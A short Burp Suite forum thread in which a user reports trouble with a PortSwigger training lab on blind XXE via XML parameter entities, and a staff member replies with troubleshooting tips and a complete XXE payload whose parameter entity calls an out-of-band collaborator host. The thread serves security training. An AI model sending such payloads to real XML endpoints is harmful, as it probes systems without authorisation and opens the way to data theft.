Burp Suite User Forum

Login to post

problem with this lab : Lab: Blind XXE with out-of-band interaction via XML parameter entities

Deepak | Last updated: Sep 12, 2021 02:02PM UTC

i cant solve the lab even after using solution it says entities not allowed

Deepak | Last updated: Sep 12, 2021 02:07PM UTC

https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities

Deepak | Last updated: Sep 12, 2021 02:07PM UTC

https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities

Uthman, PortSwigger Agent | Last updated: Sep 13, 2021 08:48AM UTC

Hi Deepak, The lab does appear to be functioning as expected. I have just completed it successfully. Can you try waiting ~15 minutes for it to reset before attempting this again? Are you using Burp Suite Professional? Does your payload look something like the below? <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://<collaborator-subdomain>.burpcollaborator.net"> %xxe; ]> <stockCheck> <productId>2</productId> <storeId>1</storeId> </stockCheck>

You need to Log in to post a reply. Or register here, for free.